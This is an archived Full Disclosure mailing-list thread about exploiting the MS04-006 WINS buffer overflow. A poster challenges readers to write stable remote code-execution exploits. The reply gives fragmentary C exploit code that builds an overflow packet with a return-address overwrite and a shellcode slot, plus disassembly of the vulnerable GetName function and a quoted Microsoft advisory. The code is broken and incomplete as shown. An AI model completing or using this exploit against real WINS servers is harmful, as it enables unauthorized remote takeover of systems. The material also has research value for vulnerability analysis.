Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: ms04-006 exploit challenges
From: yuange <yuange1975 () hotmail com>
Date: Sun, 2 Jan 2011 12:55:43 +0000


int  GetOverStr(char *buf,char *server,char *urlfile,int ptr)
    unsigned char   wins_unknown_1[]    =
    0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x40, 0xff,
    0x05, 0x5a, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00
// ,    0x00, 0x00, 0x00, 0x00
    unsigned int    buflen;
    unsigned int    p_shellcode;
    unsigned char  *p;
    unsigned int    i,j;
   // char            ltime[0x10]; 
 char smbname[]="WINDOWS        ";

 memset( buf,0x42, BUFFSIZE);
    write_misaligned_32( wins_unknown_1 + 0x008, 0);   //htonl( p_winsbuf ) );
    CopyMemory( buf, wins_unknown_1, sizeof( wins_unknown_1 ) );
           buf[2*i+sizeof( wins_unknown_1 )+1]=smbname[i]/0x10+'A';
     buf[2*i+1+sizeof( wins_unknown_1 )+1]=smbname[i]%0x10+'A';
       memset( buf + sizeof( wins_unknown_1 )+i*0x3f, 0x3e,1);

 memcpy( buf + sizeof( wins_unknown_1 )+0x128, "\x00\x00\x00\x00",4);
    memset( buf + sizeof( wins_unknown_1 )+i*0x3f, 0x3b,1);
    memset( buf + sizeof( wins_unknown_1 )+i*0x3f+0x3b+1, 0x0,1);

    j = rand();

 *(int *)(buf+sizeof( wins_unknown_1 )+i*0x3f+0x3b+1+0x0a)=0x100;  
    *(int *)(buf+sizeof( wins_unknown_1 )+i*0x3f+0x3b+1+0x13)=j;  //ip

  memcpy(buf+sizeof( wins_unknown_1 )+i+0x960,popvar,4);  
        memcpy(buf+sizeof( wins_unknown_1 )+i+0x964,eipjmpebxwin2000,4);  
 *(int *)(buf+0x9a0-5)=ptr;
 j=GetShellcode(buf+0x9a0 );
 buflen      =j+0x9a0+0x20;
    write_misaligned_32( buf, htonl( buflen - 4 ) );

VOID GetName(   IN  OUT LPBYTE    *pName,
 IN  OUT LPBYTE    Name,
   int    Length;  
   int    MaxLen   = 0x101; 
   int    nbtlen;

   *NameLen = 0;  
   if (( *pName &0xc0) != 0) goto error;
   Length = *pName &0x3f;

   while(nbtlen > 0 )
 Length -= 2;     
 *Name++  =(((*pName ++- 'A')<< 4) | (*pName ++ - 'A'));
   MaxLen -= Length;
      Length=0  or Length=-1?
     MaxLen -= (*NameLen);
    if (--MaxLen >= 0) {
        *Name++ = 0;  
    } else {
        goto error;
0:000> uf  NmsMsgfProcNbtReq
01011abe 55              push    ebp
01011abf 8bec            mov     ebp,esp
01011ac1 6aff            push    0FFFFFFFFh
01011ac3 6850210001      push    offset wins!`string'+0x7c (01002150)
01011ac8 6880280101      push    offset wins!_except_handler3 (01012880)
01011acd 64a100000000    mov     eax,dword ptr fs:[00000000h]
01011ad3 50              push    eax
01011ad4 64892500000000  mov     dword ptr fs:[0],esp
01011adb 51              push    ecx
01011adc 51              push    ecx
01011add 81ec74020000    sub     esp,274h
01011ae3 53              push    ebx
01011ae4 56              push    esi
01011ae5 57              push    edi
01011ae6 8965e8          mov     dword ptr [ebp-18h],esp
01011ae9 c785bcfeffff01000000 mov dword ptr [ebp-144h],1
01011af3 8365dc00        and     dword ptr [ebp-24h],0
01011af7 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
01011afa 897dd8          mov     dword ptr [ebp-28h],edi
01011afd 8365fc00        and     dword ptr [ebp-4],0
01011b01 8a5f02          mov     bl,byte ptr [edi+2]
01011b04 c1eb03          shr     ebx,3
01011b07 83e30f          and     ebx,0Fh
01011b0a 895de0          mov     dword ptr [ebp-20h],ebx
01011b0d 8d470c          lea     eax,[edi+0Ch]
01011b10 8945d8          mov     dword ptr [ebp-28h],eax
01011b13 8945c4          mov     dword ptr [ebp-3Ch],eax
01011b16 8d45c8          lea     eax,[ebp-38h]
01011b19 50              push    eax
01011b1a 8d85c0feffff    lea     eax,[ebp-140h]
buff, ebp-140
 can not rewrite eip ?
01011b20 50              push    eax
01011b21 8d45d8          lea     eax,[ebp-28h]
01011b24 50              push    eax
01011b25 e815020000      call    wins!GetName (01011d3f)



From: yuange1975 () hotmail com
To: full-disclosure () lists grok org uk
Subject: ms04-006 exploit challenges
Date: Sun, 26 Dec 2010 06:04:54 +0000

   Microsoft says this vulnerability winnt \ win2k can not refuse service, win2003 under denial of service can not only 
use, only that they do not understand overflow.


1, write winnt \ win2k \ win2003 under steady use.

2, the stability of writing using a firewall. Firewall only opened tcp42, does not allow outreach services can not 
affect the original wins.

1 and 2 are willing to write to the company applying for Send your resume over.


Vulnerable code is as follows:
0:000> uf wins!getname
01011d38 55              push    ebp
01011d39 8bec            mov     ebp,esp
01011d3b 8b4508          mov     eax,dword ptr [ebp+8]
01011d3e 53              push    ebx
01011d3f 56              push    esi
01011d40 8b7510          mov     esi,dword ptr [ebp+10h]
01011d43 8b00            mov     eax,dword ptr [eax]
01011d45 33db            xor     ebx,ebx
01011d47 891e            mov     dword ptr [esi],ebx
01011d49 57              push    edi
01011d4a 0fb608          movzx   ecx,byte ptr [eax]
01011d4d 8bd1            mov     edx,ecx
01011d4f 81e2c0000000    and     edx,0C0h
01011d55 895510          mov     dword ptr [ebp+10h],edx
01011d58 0f8589000000    jne     wins!GetName+0xaf (01011de7)
01011d5e 83e13f          and     ecx,3Fh
01011d61 40              inc     eax
01011d62 3bcb            cmp     ecx,ebx
01011d64 894d10          mov     dword ptr [ebp+10h],ecx
01011d67 7e28            jle     wins!GetName+0x59 (01011d91)
01011d69 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
01011d6c 8d5101          lea     edx,[ecx+1]
01011d6f d1ea            shr     edx,1
01011d71 8a08            mov     cl,byte ptr [eax]
01011d73 8a5801          mov     bl,byte ptr [eax+1]
01011d76 80e941          sub     cl,41h
01011d79 40              inc     eax
01011d7a 836d1002        sub     dword ptr [ebp+10h],2
01011d7e 80eb41          sub     bl,41h
01011d81 c0e104          shl     cl,4
01011d84 0ad9            or      bl,cl
01011d86 881f            mov     byte ptr [edi],bl
01011d88 47              inc     edi
01011d89 40              inc     eax
01011d8a ff06            inc     dword ptr [esi]
01011d8c 4a              dec     edx
01011d8d 75e2            jne     wins!GetName+0x39 (01011d71)
01011d8f eb03            jmp     wins!GetName+0x5c (01011d94)
01011d91 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
01011d94 b901010000      mov     ecx,101h
01011d99 2b4d10          sub     ecx,dword ptr [ebp+10h]
01011d9c 33db            xor     ebx,ebx
01011d9e 3818            cmp     byte ptr [eax],bl
01011da0 7434            je      wins!GetName+0x9e (01011dd6)
01011da2 813eef000000    cmp     dword ptr [esi],0EFh
01011da8 773d            ja      wins!GetName+0xaf (01011de7)
01011daa 49              dec     ecx
01011dab 3bcb            cmp     ecx,ebx
01011dad 7e38            jle     wins!GetName+0xaf (01011de7)
01011daf c6072e          mov     byte ptr [edi],2Eh
01011db2 47              inc     edi
01011db3 ff06            inc     dword ptr [esi]
01011db5 8a10            mov     dl,byte ptr [eax]
01011db7 83e23f          and     edx,3Fh
01011dba 2bca            sub     ecx,edx
01011dbc 3bcb            cmp     ecx,ebx
01011dbe 7e27            jle     wins!GetName+0xaf (01011de7)
01011dc0 40              inc     eax
01011dc1 8bda            mov     ebx,edx
01011dc3 4a              dec     edx
01011dc4 85db            test    ebx,ebx
01011dc6 74d4            je      wins!GetName+0x64 (01011d9c)
01011dc8 42              inc     edx
01011dc9 8a18            mov     bl,byte ptr [eax]
01011dcb 881f            mov     byte ptr [edi],bl
01011dcd 47              inc     edi
01011dce 40              inc     eax
01011dcf ff06            inc     dword ptr [esi]
01011dd1 4a              dec     edx
01011dd2 75f5            jne     wins!GetName+0x91 (01011dc9)
01011dd4 ebc6            jmp     wins!GetName+0x64 (01011d9c)
01011dd6 40              inc     eax
01011dd7 49              dec     ecx
01011dd8 85c9            test    ecx,ecx
01011dda 7c0b            jl      wins!GetName+0xaf (01011de7)
01011ddc 8b4d08          mov     ecx,dword ptr [ebp+8]
01011ddf 881f            mov     byte ptr [edi],bl
01011de1 ff06            inc     dword ptr [esi]
01011de3 8901            mov     dword ptr [ecx],eax
01011de5 eb2a            jmp     wins!GetName+0xd9 (01011e11)
01011de7 53              push    ebx
01011de8 6892030000      push    392h
01011ded 68d4200001      push    offset wins!`string' (010020d4)
01011df2 6817100140      push    40011017h
01011df7 6a01            push    1
01011df9 68010000e0      push    0E0000001h
01011dfe e8330b0000      call    wins!WinsEvtLogEvt (01012936)
01011e03 53              push    ebx
01011e04 53              push    ebx
01011e05 53              push    ebx
01011e06 680a0000e0      push    0E000000Ah
01011e0b ff1598100001    call    dword ptr [wins!_imp__RaiseException (01001098)
01011e11 5f              pop     edi
01011e12 5e              pop     esi
01011e13 5b              pop     ebx
01011e14 5d              pop     ebp
01011e15 c20c00          ret     0Ch
Technical description: 
A security vulnerability exists in the Windows Internet Naming Service (WINS). This vulnerability exists because of the 
method that WINS uses to validate the length of specially-crafted packets. On Windows Server 2003 this vulnerability 
could allow an attacker who sent a series of specially-crafted packets to a WINS server to cause the service to fail. 
Most likely, this could cause a denial of service, and the service would have to be manually restarted to restore 
The possibility of a denial of service on Windows Server 2003 results from the presence of a security feature that is 
used in the development of Windows Server 2003. This security feature detects when an attempt is made to exploit a 
stack-based buffer overrun and reduces the chance that it can be easily exploited. This security feature can be forced 
to terminate the service to prevent malicious code execution. On Windows Server 2003, when an attempt is made to 
exploit the buffer overrun, the security feature reacts and terminates the service. This results in a denial of service 
condition of WINS. Because it is possible that methods may be found in the future to bypass this security feature, 
which could then enable code execution, customers should apply the update. For more information about these security 
features, visit the following Web site.
On Windows NT and Windows 2000, the nature of the vulnerability is slightly different. WINS will reject the 
specially-crafted packet and the attack does not result in a denial of service. The vulnerability on these platforms 
also does not allow code execution. Microsoft is releasing a security update for these platforms that corrects the 
vulnerable code as a preventive measure to help protect these platforms in case methods are found in the future to 
exploit this vulnerability.
Mitigating factors: 


The WINS service is not installed by default.

On Windows Server 2003, WINS automatically restarts if it fails. After the third automatic restart, WINS requires a 
manual restart to restore functionality.

On Windows 2000 and Windows NT 4.0, WINS contains the vulnerable code. However, on these platforms this issue does not 
cause a denial of service. 

The vulnerability would not enable an attacker to gain any privileges on an affected system. Under the most likely 
attack scenario, this issue is strictly a denial of service. 

Firewall best practices and standard default firewall configurations can help protect networks from remote attacks that 
originate outside the enterprise perimeter. Best practices recommend blocking all ports that are not being used. In 
most network configurations, the WINS server is not available for connection from over the Internet. 

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Re: ms04-006 exploit challenges yuange (Jan 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]